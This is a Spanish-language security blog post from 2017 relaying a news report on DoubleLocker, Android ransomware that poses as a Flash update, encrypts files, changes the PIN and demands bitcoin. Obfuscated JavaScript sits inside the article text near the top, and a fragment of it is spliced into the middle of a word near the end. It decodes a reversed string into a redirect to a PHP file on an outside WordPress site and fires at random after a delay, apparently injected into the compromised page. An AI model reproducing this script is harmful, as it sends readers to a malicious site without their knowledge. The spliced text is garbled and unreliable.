DoubleLocker : Un nuevo virus que codifica ficheros y cambia tus password
Según alertaron especialistas en ciberseguridad de la empresa ESET, este novedoso software malicioso es una doble amenaza para buena parte de los smartphones.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos/212/imagenes/021/777/0021777735.jpg?” width=”642″ height=”321″ /></p>
<p>Un nuevo tipo de ransomware llamado DoubleLocker afecta a sistemas operativos Android en los que se haya descargado una falsa actualización del Adobe Flash Player y produce una encriptación de archivos y el cambio de las contraseñas para luego pedir un rescate monetario a sus propietarios.<br />
Según alertaron especialistas en ciberseguridad de la empresa ESET, este novedoso software malicioso es una doble amenaza para buena parte de los smartphones que actualmente utilizan Android como sistema operativo.</p>
<p>Además de bloquear la pantalla de contraseña y los archivos, por tener su origen en un malware bancario, DoubleLocker podría llegar a utilizarse también para robar fondos o contraseñas bancarias que hubiera en el teléfono, alertaron los especialistas.</p>
<p>La infección comienza cuando el usuario visita algún sitio inseguro en el que se le pide que instale el “Adobe Flash Player” para continuar navegando, siendo en realidad el programa de instalación de este ramsomware.</p>
<p>Una vez activado, este software simula una pantalla como la de Google Play en la que se pide permiso para “cambiar la contraseña” de ingreso al smartphone y que, si es concedido por el usuario, habilita la encriptación del dispositivo.</p>
<p>A partir de allí es imposible acceder al teléfono y, como pantalla de inicio, se muestra un mensaje que anuncia el ataque y pide un “rescate” de 0.0130 bitcoin (alrededor de 74.11 dólares en la cotización actual).</p>
<p>A diferencia de ataques anteriores, este ransomware no necesita que el dispositivo esté “rooteado”, es decir, que el usuario haya iniciado un proceso que le permite un acceso avanzado a la configuración del mismo.</p>
<p>Para el usuario medio afectado, las soluciones pasan por hacer el pago o hacer el restablecimien<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to de los parámetros de fábrica del dispositivo que borra todo archivo que se encuentre dentro del mismo.
El usuario avanzado podrá optar por intentar recuperar su teléfono y sus archivos sólo el dispositivo estaba previamente rooteado y en modo de depuración.
Fuente: Télam
Ver información original al respecto en Fuente:
Mas información al respecto en:
saludos
ms, 15-10-2017
__________
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.